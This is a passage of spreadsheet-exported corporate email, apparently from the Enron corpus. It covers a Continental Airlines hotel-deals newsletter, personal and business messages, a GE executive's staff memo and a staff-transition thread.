Cleveland, OH - Four Points by Sheraton Akron West  - $59.00_x000D_
_x000D_
Colorado Springs, CO - Sheraton Colorado Springs Hotel - $82.00_x000D_
Colorado Springs, CO - Four Points by Sheraton Denver West - $51.00_x000D_
_x000D_
Houston, TX - The Westin Oaks - $71.00_x000D_
Houston, TX - The Westin Galleria Houston - $64.00_x000D_
Houston, TX - The St. Regis, Houston - $95.00_x000D_
_x000D_
Kansas City, MO - Sheraton Suites Country Club Plaza - $77.00_x000D_
Kansas City, MO - Four Points by Sheraton Kansas City Country Club Plaza -_x000D_
$71.00_x000D_
_x000D_
Los Angeles, CA - Westin Los Angeles Airport - $77.00_x000D_
Los Angeles, CA - Sheraton Gateway Hotel Los Angeles International Airport =_x000D_
-_x000D_
$62.00_x000D_
Los Angeles, CA - Four Points by Sheraton Los Angeles International Airport=_x000D_
 -_x000D_
$57.00_x000D_
Los Angeles, CA - Four Points by Sheraton Monrovia - $65.00_x000D_
_x000D_
New York, NY - Essex House, a Westin Hotel - $227.00_x000D_
New York, NY - Sheraton Russell Hotel  - $168.00_x000D_
New York, NY - The St. Regis Club at the Essex House - $323.00_x000D_
New York, NY - W New York- The Court - $213.00_x000D_
_x000D_
Norfolk, VA - Sheraton Norfolk Waterside Hotel - $81.00_x000D_
Norfolk, VA - Four Points by Sheraton Williamsburg Historic District - $64.=_x000D_
34_x000D_
_x000D_
Oklahoma City, OK - Sheraton Tulsa Hotel - $56.00_x000D_
_x000D_
Richmond, VA - Four Points by Sheraton Williamsburg Historic District - $64=_x000D_
.34_x000D_
_x000D_
Rochester, NY - Four Points by Sheraton Niagara Falls - by the Falls - $199=_x000D_
.00_x000D_
_x000D_
San Jose, CA - Westin St. Francis - $209.00_x000D_
San Jose, CA - Four Points by Sheraton Pleasanton - $58.00_x000D_
_x000D_
Washington, DC - Sheraton Suites Alexandria - $79.00_x000D_
Washington, DC - Sheraton Columbia Hotel - $71.00_x000D_
Washington, DC - Sheraton Premier at Tyson=01,s Corner - $64.00_x000D_
Washington, DC - The St. Regis, Washington DC - $205.00_x000D_
_x000D_
_x000D_
Visit our site for booking these Last-Minute Weekend Rates_x000D_
http://airmail.continental.com/cgi-bin5/flo?y=3DeCws0BevJT0Ow0D7n8_x000D_
_x000D_
For complete details on these offers, please refer to the terms and_x000D_
conditions below._x000D_
_x000D_
_x000D_
****************************************_x000D_
7.  CO.O.L. TRAVEL SPECIALS ON HILTON HOTELS AND RESORTS_x000D_
_x000D_
The following rates are available January 13-15, 2001 and are priced per=20_x000D_
night._x000D_
--------------------------------------_x000D_
Airport:  Boston, Massachusetts (BOS)_x000D_
Rate:     $135    Hilton Boston Back Bay, Boston  MA    (In Back Bay_x000D_
near museums, theatres, &amp; shopping.  Walk the Freedom Trail!)_x000D_
_x000D_
Airport:  Boston, Massachusetts (BOS)_x000D_
Rate:     $99    Hilton Boston Logan Airport, Boston  MA    (Located at_x000D_
the airport and only two(2) miles from downtown via Ted Williams Tunnel._x000D_
Offers weekend shuttle service to downtown.)_x000D_
_x000D_
Airport:  Boston, Massachusetts (BOS)_x000D_
Rate:     $109    Doubletree Guest Suites Boston, Boston  MA_x000D_
(Ideally located on the scenic Charles River, the Doubletree Guest Suites_x000D_
Boston/Cambridge is Boston's only full service luxury all suite hotel.)_x000D_
_x000D_
Airport:  Boston, Massachusetts (BOS)_x000D_
Rate:     $209    University Park Hotel at MIT-Cambridge, Cambridge  MA_x000D_
(Doubletree Guest Suites-Waltham, which is situated in the heart of_x000D_
Massachusetts' high-technology corridor, is ideal for business and leisure_x000D_
travelers alike.)_x000D_
_x000D_
Airport:  Boston, Massachusetts (BOS)_x000D_
Rate:     $109 1/13-14, Doubletree Hotel Lowell, Lowell  MA_x000D_
(Overlooking Lowell's historic canals, just a short drive to museums, outle=_x000D_
t_x000D_
malls, and much more.)_x000D_
_x000D_
Airport:  Boston, Massachusetts (BOS)_x000D_
Rate:     $109    Doubletree Hotel Boston-Downtown, Boston  MA_x000D_
(Downtown Boston features Boston's newest Full Service Hotel.)_x000D_
_x000D_
Airport:  Boston, Massachusetts (BOS)_x000D_
Rate:     $109    Doubletree Guest Suites Boston/Waltham, Waltham  MA_x000D_
(This hotels' unique location puts you close to historic Lexington and_x000D_
Concord.)_x000D_
_x000D_
Airport:  Cleveland, Ohio (CLE)_x000D_
Rate:     $59    Hilton Garden Inn Cleveland Airport, Cleveland  OH_x000D_
(Just two miles from Cleveland Airport, and only 12 miles from downtown.)_x000D_
_x000D_
Airport:  Cleveland, Ohio (CLE)_x000D_
Rate:     $69    Hilton Cleveland South, Cleveland  OH    (Located 8_x000D_
miles from the Rock-n-Roll Hall of Fame and downtown Cleveland.)_x000D_
_x000D_
Airport:  Dayton, Ohio (DAY)_x000D_
Rate:     $59    Doubletree Guest Suites Dayton/Miamisburg, Miamisburg_x000D_
OH    (Centrally located within minutes of downtown and numerous corporate_x000D_
headquarters and adjacent to the 160-store Dayton Mall.)_x000D_
_x000D_
Airport:  Washington, DC (DCA/IAD)_x000D_
Rate:     $89    Hilton McLean Tysons Corner, McLean  VA_x000D_
(Free shuttle to the Metro and famous Tyson's I and II shopping.)_x000D_
_x000D_
Airport:  Washington, DC (DCA/IAD)_x000D_
Rate:     $179,  1/13-14   Hilton Washington, Washington  DC    (Hotel_x000D_
is located near the Metro, central to all area attractions.)_x000D_
_x000D_
Airport:  Washington, DC (DCA/IAD)_x000D_
Rate:     $94    Hilton Springfield, Springfield  VA    (Across from_x000D_
Springfield Mall; free shuttle to metro; 15 min to DC area.)_x000D_
_x000D_
Airport:  Washington, DC (DCA/IAD)_x000D_
Rate:     $79    Hilton Crystal City @ National Airport, Arlington  VA_x000D_
(Free airport shuttle, located five minutes from the sights of DC.)_x000D_
_x000D_
Airport:  Washington, DC (DCA/IAD)_x000D_
Rate:     $89    Hilton Alexandria Mark Center, Alexandria  VA_x000D_
(Located in the West End of historic Alexandria, Virginia.)_x000D_
_x000D_
Airport:  Newark, New Jersey (EWR)_x000D_
Rate:     $199    Hilton Newark Airport, Elizabeth  NJ    (Free airport_x000D_
shuttle, 5 minutes from New Jersey Performing Arts Center.)_x000D_
_x000D_
Airport:  Newark, New Jersey (EWR)_x000D_
Rate:     $2, $149, 1/13-15, Doubletree Hotel &amp; Executive Meeting Center_x000D_
Somerset  NJ    (Centrally located in New Jersey in one of America's_x000D_
most dynamic corporate communities.)_x000D_
_x000D_
Airport:  Newark, New Jersey (EWR)_x000D_
Rate:     $169    Doubletree Club Suites Jersey City, Jersey City  NJ_x000D_
(The Doubletree Club Suites Jersey City features a fitness room, and_x000D_
complimentary shuttle to local businesses.)_x000D_
_x000D_
Airport:  Newark, NJ &amp; New York=01,s LaGuardia (EWR/LGA)_x000D_
Rate:     $129    Hilton Hasbrouck Heights, Hasbrouck Heights  NJ_x000D_
(Located just 4 miles from the Meadowlands Sports Complex and 9 miles from_x000D_
New York City!)_x000D_
_x000D_
Airport:  Newark, NJ &amp; New York=01,s LaGuardia (EWR/LGA)_x000D_
Rate:     $79    Hilton Parsippany, Parsippany  NJ    (Only 3 miles from_x000D_
downtown Morristown &amp; 25 miles from New York City.)_x000D_
_x000D_
Airport:  Newark, NJ &amp; New York=01,s LaGuardia (EWR/LGA)_x000D_
Rate:     $109    Hilton Fort Lee George Washington Bridge, Fort Lee  NJ_x000D_
(10 miles from Manhattan's Broadway Theaters &amp; Empire State Building.)_x000D_
_x000D_
Airport:  Newark, NJ &amp; New York=01,s LaGuardia (EWR/LGA)_x000D_
Rate:     $299    Hilton Short Hills, Short Hills  NJ    (Deluxe_x000D_
accommodations in New Jersey's only 5 diamond luxury hotel.)_x000D_
_x000D_
Airport:  Newark, NJ &amp; New York=01,s LaGuardia (EWR/LGA)_x000D_
Rate:     $135    Millennium Hilton Next to the World Trade Center, New_x000D_
York  NY    (Downtown Manhattan, near Statue of Liberty, China Town, &amp; Elli=_x000D_
s_x000D_
Island.)_x000D_
_x000D_
Airport:  Newark, NJ &amp; New York=01,s LaGuardia (EWR/LGA)_x000D_
Rate:     $189    Hilton East Brunswick, East Brunswick  NJ    (In=20_x000D_
central New Jersey (40 min from NYC) Princeton &amp; Rutgers Universities.)_x000D_
_x000D_
Airport:  Intercontinental Airport Houston, Texas (IAH)_x000D_
Rate:     $88    Hilton Houston Hobby Airport, Houston  TX    (Across_x000D_
from Hobby Airport (free shuttle) - near Astroworld, NASA and racetracks.)_x000D_
_x000D_
|Airport: Intercontinental Airport Houston, Texas (IAH)_x000D_
Rate:     $99    Hilton Houston Southwest, Houston  TX    (Only 9 miles_x000D_
from downtown Houston, Free shuttle to the Galleria Mall.)_x000D_
_x000D_
|Airport: Intercontinental Airport Houston, Texas (IAH)_x000D_
Rate:     $155    Hilton Houston Plaza, Houston  TX    (Located in_x000D_
fashionable West University near Houston's cultural district.)_x000D_
_x000D_
Airport:  Intercontinental Airport Houston, Texas (IAH)_x000D_
Rate:     $165    Doubletree Hotel Houston-Post Oak, Houston  TX_x000D_
(Located in the heart of Uptown Houston Business district and 2 blocks from_x000D_
the Galleria Mall.)_x000D_
_x000D_
Airport:  Los Angeles, California (LAX)_x000D_
Rate:     $99    Hilton Port of Los Angeles/San Pedro, San Pedro  CA_x000D_
(Minutes away from the Queen Mary, shopping and walking distance to beach.)_x000D_
_x000D_
Airport: Los Angeles, California (LAX)_x000D_
Rate:     $84, 1/13-14,  Hilton Woodland Hills &amp; Towers, Woodland Hills_x000D_
CA    (Located 25 miles west of downtown LA, driving distance to Universal_x000D_
Studios.)_x000D_
_x000D_
Airport: Los Angeles, California (LAX)_x000D_
Rate:     $99, 1/13-14,  Hilton Irvine/Orange County Airport, Irvine  CA_x000D_
(Located 30 miles from LAX on the border of Irvine &amp; Newport Beach.)_x000D_
_x000D_
Airport:  Los Angeles, California (LAX)_x000D_
Rate:     $105    Hilton Los Angeles Airport, Los Angeles  CA    (Near_x000D_
Disneyland, Beverly Hills, Hollywood and Southern CA beaches.)_x000D_
_x000D_
Airport:  Los Angeles, California (LAX)_x000D_
Rate:     $99    Hilton Suites Anaheim/Orange, Orange  CA    (An all_x000D_
suite hotel offering cooked to order breakfast and evening beverage_x000D_
reception!)_x000D_
_x000D_
|Airport: Los Angeles, California (LAX)_x000D_
Rate:     $179    Hilton Pasadena, Pasadena  CA    (This hotel offers_x000D_
views of beautiful San Gabriel Mountains, within eight miles from Old Town_x000D_
Pasadena.)_x000D_
_x000D_
Airport:  Los Angeles, California (LAX)_x000D_
Rate:     $119    Hilton Burbank Airport &amp; Convention Center, Burbank_x000D_
CA    (Free shuttle to Universal Studios Hollywood &amp; Media City Center Mall=_x000D_
.)_x000D_
_x000D_
Airport:  Los Angeles, California (LAX)_x000D_
Rate:     $169    Hilton Glendale, Glendale  CA    (Situated just_x000D_
walking distance from downtown Glendale and all major businesses in the_x000D_
area.)_x000D_
_x000D_
Airport:  Los Angeles, California (LAX)_x000D_
Rate:     $78    Doubletree Hotel Anaheim/Orange County, Orange  CA_x000D_
(Close to Southern California's major metro areas, business center, and_x000D_
world famous tourist attractions.)_x000D_
_x000D_
Airport: Los Angeles, California (LAX)_x000D_
Rate:     $149    Doubletree Hotel Pasadena-Plaza Las Fuentes, Pasadena_x000D_
CA    (Only 6 miles to the LA Arboretum, 5 miles to the LA Zoo and easy_x000D_
access to NBC and Univeral Studios!)_x000D_
_x000D_
Airport: Kansas City, Missouri (MCI)_x000D_
Rate:     $119    Hilton Kansas City Airport, Kansas City  MO_x000D_
(Located 20 minutes from riverboat casinos and Downtown Kansas City.)_x000D_
_x000D_
Airport: Oklahoma City, Oklahoma (OKC)_x000D_
Rate:     $89    Hilton Oklahoma City Northwest, Oklahoma City  OK_x000D_
(Located in the hub of Oklahoma City's growing northwest business district.=_x000D_
)_x000D_
_x000D_
Airport:  Norfolk, Virginia (ORF)_x000D_
Rate:     $59, 1/13-14,   Hilton Norfolk Airport, Norfolk  VA    (Near_x000D_
historic Williamsburg, beautiful beaches, &amp; world's largest naval base.)_x000D_
_x000D_
Airport: Richmond, Virginia (RIC)_x000D_
Rate:     $89, 1/13-14,  Hilton Richmond Airport, Sandston  VA    (Near_x000D_
Busch Gardens, Aviation Museum and the Museum of the Confederacy.  Colonial_x000D_
Williamsburg is 40 minutes away)_x000D_
_x000D_
Airport:  San Jose, California (SJC)_x000D_
Rate:     $84, 1/13-14,  Hilton Garden Inn San Mateo, San Mateo  CA_x000D_
(Located in the center of the San Francisco Bay Peninsula in San Mateo_x000D_
County at Bridgepoint Center)_x000D_
_x000D_
Airport:  San Jose, California (SJC)_x000D_
Rate:     $249    Hilton Garden Inn Mountain View, Mountain View  CA_x000D_
(In the midst of Silicon Valley, NASA Ames Research Center, the U.S. Space_x000D_
Camp &amp; Stanford University are within 15 mins.)_x000D_
_x000D_
Airport: San Jose, California (SJC)_x000D_
Rate:     $89    Hilton Monterey, Monterey  CA    (Located downtown, 1_x000D_
mile to the beach, 2 miles from Cannery Row)_x000D_
_x000D_
_x000D_
To book this week's special rates for Hilton Family Hotels, visit and book =_x000D_
at_x000D_
http://airmail.continental.com/cgi-bin5/flo?y=3DeCws0BevJT0Ow0B3zF_x000D_
_x000D_
Special rates apply only for the dates listed at each hotel and are subject=_x000D_
 to_x000D_
availability.  Check hilton.com for specific dates at each Hilton Family=20_x000D_
Hotel._x000D_
_x000D_
Or call at 1-800-774-1500 and ask for Value Rates. Restrictions apply to th=_x000D_
ese_x000D_
rates._x000D_
_x000D_
_x000D_
****************************************_x000D_
CO.O.L. TRAVEL SPECIALS RULES:_x000D_
Fares include a $37.20 fuel surcharge.  Passenger Facility Charges, up_x000D_
to $12 depending on routing, are not included. Up to Three dollars per_x000D_
segment federal excise tax, as applicable, is not included.  Applicable_x000D_
International and or Canadian taxes and fees up to $88, varying by_x000D_
destination, are not included and may vary slightly depending on currency_x000D_
exchange rate at the time of purchase._x000D_
For a complete listing of rules please visit:_x000D_
http://airmail.continental.com/cgi-bin5/flo?y=3DeCws0BevJT0Ow0Ebnr_x000D_
_x000D_
_x000D_
ALAMO RENT A CAR'S TERMS AND CONDITIONS:_x000D_
Taxes (including VLF taxes up to US$1.89 per day in California and GST),_x000D_
other governmentally-authorized or imposed surcharges, license recoupment_x000D_
fees, fuel, additional driver fee, drop charges and optional items (such as_x000D_
CDW Waiver Savers(R) up to US$18.99 a day,) are extra. Renter must meet_x000D_
standard age, driver and credit requirements. Rates higher for drivers unde=_x000D_
r_x000D_
age 25. Concession recoupment fees may add up to 14% to the rental rate at_x000D_
some on-airport locations. Up to 10.75% may be added to the rental rate if_x000D_
you rent at an off-airport location and exit on our shuttle bus. Weekly_x000D_
rates require a 5-day minimum rental or daily rates apply. For weekend_x000D_
rates, the vehicle must be picked up after 9 a.m. on Thursday and returned_x000D_
before midnight on Monday or higher daily rates apply. 24-hour advance_x000D_
reservation required. May not be combined with other discounts. Availabilit=_x000D_
y_x000D_
is limited. All vehicles must be returned to the country of origin. Offer_x000D_
not valid in San Jose, CA._x000D_
_x000D_
NATIONAL CAR RENTAL TERMS AND CONDITIONS:_x000D_
Customer must provide Contract ID# at the time of reservation to be eligibl=_x000D_
e_x000D_
for discounts. Offer valid at participating National locations in the US an=_x000D_
d_x000D_
Canada. Minimum rental age is 25. This offer is not valid with any other_x000D_
special discount or promotion. Standard rental qualifications apply. Subjec=_x000D_
t_x000D_
to availability and blackout dates. Advance reservations required._x000D_
Geographic driving restrictions may apply._x000D_
_x000D_
_x000D_
TERMS AND CONDITIONS FOR WESTIN, SHERATON, FOUR POINTS,_x000D_
ST. REGIS, THE LUXURY COLLECTION, AND W HOTELS:_x000D_
Offer is subject to availability. Advance Reservations required and is base=_x000D_
d=20_x000D_
on_x000D_
single/double occupancy. Offer not applicable to group travel. Additional_x000D_
Service charge and tax may apply. The discount is reflected in the rate=20_x000D_
quoted._x000D_
Offer valid at participating hotel only. Offer valid for stays on Fri - Mon=_x000D_
=20_x000D_
with_x000D_
a Friday or Saturday night arrival required. Rate available for this coming_x000D_
weekend only (01/05/2001 to 01/08/2001.) Offer available only by making_x000D_
reservations via the internet. A limited number of rooms may be available a=_x000D_
t_x000D_
these rates._x000D_
http://airmail.continental.com/cgi-bin5/flo?y=3DeCws0BevJT0Ow0FG2R_x000D_
_x000D_
_x000D_
---------------------------------------_x000D_
This E-mail message and its contents are copyrighted and are proprietary_x000D_
products of Continental Airlines, Inc.  Any unauthorized use, reproduction,_x000D_
or transfer of the message or its content, in any medium, is strictly_x000D_
prohibited._x000D_
_x000D_
****************************************_x000D_
UNFORTUNATELY MAIL SENT TO THIS ADDRESS CANNOT BE ANSWERED._x000D_
PLEASE SEND ALL INQUIRIES TO:_x000D_
mailto:eservice@coair.com_x000D_
_x000D_
_x000D_
TO UNSUBSCRIBE:_x000D_
We hope you will find CO.O.L. Travel Specials a valuable source of_x000D_
information. However, if you prefer not to take advantage of this_x000D_
opportunity, please let us know by visiting the CO.O.L. Travel Specials pag=_x000D_
e_x000D_
on our web site at:_x000D_
http://airmail.continental.com/cgi-bin5/flo?y=3DeCws0BevJT0Ow0BtI_x000D_
_x000D_
TO SUBSCRIBE:_x000D_
Please visit the CO.O.L. Travel Specials page on our web site at:_x000D_
http://airmail.continental.com/cgi-bin5/flo?y=3DeCws0BevJT0Ow0Cc1</t>
  </si>
  <si>
    <t>Tue, 21 Mar 2000 05:38:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">aren't we presumptious.  of course i want to see you tonight.  but i have to _x000D_
work out before coming over!  what are you making me for dinner?_x000D_
_x000D_
and do you want me to bring over a movie?_x000D_
_x000D_
and, by the way, you have my permission to go to your little crawfish boil on _x000D_
sat._x000D_
e_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Shanna Husser@ENRON_x000D_
03/21/2000 01:00 PM_x000D_
To: Eric Bass/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: _x000D_
_x000D_
Hey!  Did we ever come up with our plans for the week/weekend?  I know that _x000D_
you said you were busy Wednesday and Thursday night- so I figured you and I _x000D_
would do something Friday night.  Michelle (one of the girls that I work _x000D_
with) asked if I wanted to go with her to a crawfish boil Saturday late _x000D_
afternoon- but I got the idea that it wasn't a bring a date type thing.  I _x000D_
haven't eaten crawfish in an age- so sounded like fun- I know that we don't _x000D_
usually so stuff during the day on the weekends- but I wanted to make sure _x000D_
that you didn't have anything planned for us to do that afternoon before I _x000D_
told her one way or the other.  But- even if I went to the boil- I would be _x000D_
back in time to go out later that night.  _x000D_
_x000D_
Just let me know what you think.  Oh- and I guess since you can't see me _x000D_
Wednesday or Thursday- that probably means that you want to see me tonight. _x000D_
:-)_x000D_
_x000D_
Shanna_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 29 Mar 2001 07:52:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Hey Kate! I received a phone call from a Jim Cross from Automated Power _x000D_
Exchange. Now that we are confirming daily's he mentioned that he did not _x000D_
want to receive dailys per the APX Master Agreement. He told me that all _x000D_
trades are anonimus under the APX agreement and we should not be confirming _x000D_
theses. Examples: #563948 and #563381. Some of the trader doing these trades _x000D_
are Chris Mallory and Les Rawson. Could you ask them is we should continue to _x000D_
confirm these daily's or not?_x000D_
_x000D_
Thanks_x000D_
_x000D_
Kimberly</t>
  </si>
  <si>
    <t>Tue, 22 Aug 2000 11:14:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Development Center Course Offering</t>
  </si>
  <si>
    <t>PRESENTATIONS THAT WORK_x000D_
   August 29 &amp; 30 in EB560_x000D_
_x000D_
     Does your job include preparing and delivering presentations? . . . . . _x000D_
. .  Then this course is for you!_x000D_
_x000D_
This course focuses on instruction and practice in organization, delivery _x000D_
skills, design tips and use of visuals effectively (powerpoint and overhead), _x000D_
and question-and-answer models.  Participants will receive personalized, _x000D_
confidential feedback from the instructor and will develop a self-improvement _x000D_
action plan.  Customized exercises give participants first-hand experience in _x000D_
one-on-one, small groups, impromptu, and sit-down settings._x000D_
_x000D_
For registration, please click here () to go directly into the Development _x000D_
Center "Ernie", or call 3-0357.</t>
  </si>
  <si>
    <t>Tue, 16 May 2000 09:10:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Follow-up on Friday's meeting</t>
  </si>
  <si>
    <t xml:space="preserve">Yours????_x000D_
---------------------- Forwarded by Mark A Taylor/EFS/EES on 05/16/2000 04:09 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Louise Kitchen@ECT_x000D_
05/16/2000 07:09 AM_x000D_
To: "Frank Getman, HSE" &lt;fgetman@houstonstreet.com&gt; @ ENRON_x000D_
cc: "'mark.taylor@enron.com'" &lt;mark.taylor@enron.com&gt;@ENRON, _x000D_
"'dave.samuels@enron.com'" &lt;dave.samuels@enron.com&gt;@ENRON, Andy _x000D_
Zipper/Corp/Enron@Enron _x000D_
Subject: Re: Follow-up on Friday's meeting  _x000D_
_x000D_
I spoke to Mark yesterday and he is moving as fast as possible - it may be a _x000D_
good idea to start with a detailed term sheet  whilst the fuller document is _x000D_
in drafting (we will be using external counsel to speed things up)._x000D_
_x000D_
I looked at your list of products (sent by Kevin) which is a great deal wider _x000D_
than those we quote.  I think the best qay to proceed would be with a _x000D_
manageable list from which we build as soon as both parties are happy with _x000D_
the technology._x000D_
I have attached a draft list below (natual gas an power only so far), the _x000D_
terms would be dependent of their availability.  When do you plan to _x000D_
introduce financial transactions?_x000D_
_x000D_
_x000D_
_x000D_
Due to the time difference this week - the easiest way of contacting me is _x000D_
email.  I would also suggest we think about setting up a meeting for early _x000D_
next week to go through the draft._x000D_
_x000D_
Regards_x000D_
_x000D_
Louise_x000D_
_x000D_
_x000D_
_x000D_
   _x000D_
	Enron Capital &amp; Trade Resources Corp._x000D_
	_x000D_
	From:  "Frank Getman, HSE" &lt;fgetman@houstonstreet.com&gt;                        _x000D_
   05/15/2000 11:19 AM_x000D_
	_x000D_
_x000D_
To: "'mark.taylor@enron.com'" &lt;mark.taylor@enron.com&gt;_x000D_
cc: "'dave.samuels@enron.com'" &lt;dave.samuels@enron.com&gt;, "Louise Kitchen _x000D_
(E-mail)" &lt;lkitchen@enron.com&gt; _x000D_
_x000D_
Subject: Follow-up on Friday's meeting_x000D_
_x000D_
_x000D_
Hi Mark,_x000D_
_x000D_
Thanks for taking time on Friday to participate in our meeting.  I think we_x000D_
made good progress -- by the end of the day, Louise and I were able to_x000D_
resolve most, if not all, major items.  Late on Friday, Kevin Sluder from my_x000D_
office forwarded to Louise by email a list of the proposed markets on_x000D_
HoustonStreet for which we would look to receive prices electronically from_x000D_
EnronOnline.  Louise indicated that you would attempt to have a draft_x000D_
agreement available late in the day on Monday or Tuesday morning.  I wanted_x000D_
to confirm this timing so I can make sure I have the appropriate individuals_x000D_
on my end ready to turn it around.  I think it is in everyone's interest to_x000D_
try to push this forward this week._x000D_
_x000D_
Please let me know if you need any additional information from_x000D_
HoustonStreet._x000D_
_x000D_
Best regards,_x000D_
Frank Getman_x000D_
fgetman@houstonstreet.com_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 17 Oct 2001 15:57:41 -0700 (PDT)</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
Start Date: 10/17/01; HourAhead hour: 18;  HourAhead schedule download failed. Manual intervention required.</t>
  </si>
  <si>
    <t>Mon, 8 Jul 2002 01:41:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'chris.benham@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'ge.worldwide@enron.com'})</t>
  </si>
  <si>
    <t>A message from John Rice</t>
  </si>
  <si>
    <t>Good news!  Please find a message from Power Systems CEO John Rice:_x000D_
_x000D_
 Last week, I spent several days with people in Washington, D.C. and at our_x000D_
Global Research Center (GRC) in Niskayuna, NY, who play large roles in_x000D_
support of our growth plans._x000D_
_x000D_
In Washington, I visited with a number of Senators and Representatives who_x000D_
are shaping energy legislation. The purpose for these meetings was to_x000D_
introduce our business and to find out where we could be helpful in_x000D_
providing information to support their work. I also met with Bob Card, Under_x000D_
Secretary at the Department of Energy, whose office manages most of the_x000D_
government funding effort in support of new energy technologies. Bob had_x000D_
recently visited the GRC and commented on the outstanding work being done_x000D_
there and the close collaboration that existed with GEPS._x000D_
_x000D_
While I was in Washington, there was yet more "swirl" coming now from_x000D_
WorldCom and (even) Martha Stewart! The people I met with were very_x000D_
concerned about all the recent examples of poor corporate leadership. But it_x000D_
was gratifying to me to see the respect they have for GE and the reputation_x000D_
for integrity that goes with our name._x000D_
_x000D_
I also spent a day with Jon Ebacher, Vic Abate, Scott Donnelly (leader of_x000D_
the GRC), and their teams, discussing some of the great new technologies_x000D_
that are making a difference for our customers today, and creating the_x000D_
foundation for our future. I agree with Bob Card's assessment, and really_x000D_
think that the collaboration between GEPS and the GRC is outstanding and_x000D_
exemplifies the best of what we mean by "boundaryless behavior." I love the_x000D_
enthusiasm that was evident in every discussion, and am particularly pleased_x000D_
with the work being done to integrate our newest acquisitions - Bently_x000D_
Nevada, GE Wind and PII. This is the kind of work that will separate us from_x000D_
all the other companies out there that are just buying businesses to get_x000D_
bigger._x000D_
_x000D_
Great technology and great people continue to be our most important assets._x000D_
When we get it right, we can't be beat. When we get it wrong, our customers_x000D_
wonder why they cannot do business with the "six sigma" GE they read about._x000D_
_x000D_
Little things can go a long way toward making the large, complicated global_x000D_
business that we are simpler and more "user friendly" for our customers to_x000D_
work with. Customers sometimes ask us to help with problems that belong to_x000D_
someone else - another person, function, or even business. In these_x000D_
situations our response MUST be to make sure the problem gets quickly_x000D_
communicated to the teams that can resolve it._x000D_
_x000D_
Believe it or not, we have had several recent examples where GE people have_x000D_
responded with "it is not my department" or "try calling Jim" rather than_x000D_
take the initiative themselves to help. To put it mildly, this is_x000D_
unacceptable. To put it bluntly, people in customer facing positions who_x000D_
respond like this will not be left in their jobs. When it comes to customer_x000D_
centric behavior, everyone has to be in the game and we cannot let_x000D_
"functions," "departments," or "P&amp;L's" become barriers!_x000D_
_x000D_
In these uncertain times, you and I should be certain of one thing, and_x000D_
that's the importance of integrity. With everything going on in today's_x000D_
business world, integrity must be absolute. It has to guide our_x000D_
decision-making process - and ultimately defines who we are. This deeply_x000D_
held value has been, and will continue to be, a cornerstone of our_x000D_
competitive advantage, and every single GEPS employee in every corner of the_x000D_
world has a role to play._x000D_
_x000D_
Finally, in a few days we will be reporting on yet another "best quarter" in_x000D_
the long history of our business. Thanks to all of you for these results and_x000D_
for all you are doing to help us get ready for change - and success - in the_x000D_
future._x000D_
_x000D_
John</t>
  </si>
  <si>
    <t>Tue, 27 Nov 2001 09:32:26 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'keith.marlow@enron.com'})</t>
  </si>
  <si>
    <t>FW: TRANSITION</t>
  </si>
  <si>
    <t xml:space="preserve">I spoke with Jim and he does not have the excess capacity to absorb this work.  The to do list supports the business case to retain these people._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Marlow, Keith  _x000D_
Sent:	Tuesday, November 27, 2001 11:19 AM_x000D_
To:	Smith, Gary_x000D_
Cc:	Hayslett, Rod_x000D_
Subject:	RE: TRANSITION_x000D_
Sensitivity:	Private_x000D_
_x000D_
Attached is to do list supporting the remaining workload for Brannon,et al._x000D_
 _x000D_
_x000D_
My initial conversation with Jim indicated that he likely does not have the capacity but he will have to investigate.  I hope to have an answer shortly._x000D_
_x000D_
Rod, I'm prepared to talk to Stan at anytime._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Hayslett, Rod  _x000D_
Sent:	Tuesday, November 27, 2001 10:36 AM_x000D_
To:	Marlow, Keith_x000D_
Cc:	Stanley, Brian; Smith, Gary_x000D_
Subject:	RE: TRANSITION_x000D_
Importance:	High_x000D_
Sensitivity:	Private_x000D_
_x000D_
Can you answer his questions?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Smith, Gary  _x000D_
Sent:	Tuesday, November 27, 2001 10:31 AM_x000D_
To:	Hayslett, Rod; Stanley, Brian_x000D_
Subject:	RE: TRANSITION_x000D_
_x000D_
Did Keith also have discussions with Jim Saunders about picking up workload?  What will Brannon, Kadakia, Menefee and Walker be doing for EGA?_x000D_
_x000D_
None of these seven individuals were on the retain/transfer list that Stan reviewed yesterday.  Rod, if you support this, I suggest that you and Keith review this with Stan to get his approval._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Hayslett, Rod  _x000D_
Sent:	Tuesday, November 27, 2001 10:14 AM_x000D_
To:	Smith, Gary; Stanley, Brian_x000D_
Cc:	Marlow, Keith; Sommers, Jeffrey E._x000D_
Subject:	FW: TRANSITION_x000D_
Importance:	High_x000D_
_x000D_
What is the next step at this point in time?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Marlow, Keith  _x000D_
Sent:	Tuesday, November 27, 2001 9:56 AM_x000D_
To:	Hayslett, Rod_x000D_
Subject:	TRANSITION_x000D_
Importance:	High_x000D_
_x000D_
As discussed these individuals will transfer to EGA_x000D_
_x000D_
Biff Brannon_x000D_
Tushar Kadakia_x000D_
Bob Menefee_x000D_
Blake Walker_x000D_
_x000D_
_x000D_
In addition, the following would support the transition through the period stated below:_x000D_
_x000D_
Joe Grajewski -  	12/31/01	- Transition issues to Sommers_x000D_
William Gehle -   	 1/31/01		- Currently negotiating CIGSA settlement_x000D_
Amanda Camacho-	 1/31/01		- Transition A/P to Corp outsourcing group_x000D_
_x000D_
Discussions with Jeff indicate that he does not have the excess capacity to absorb the remaining issues confronting EEOS accounting._x000D_
_x000D_
		 &lt;&lt; File: Remaining EEOS Issues.ppt &gt;&gt; </t>
  </si>
  <si>
    <t>Tue, 29 May 2001 08:01:00 -0700 (PDT)</t>
  </si>
  <si>
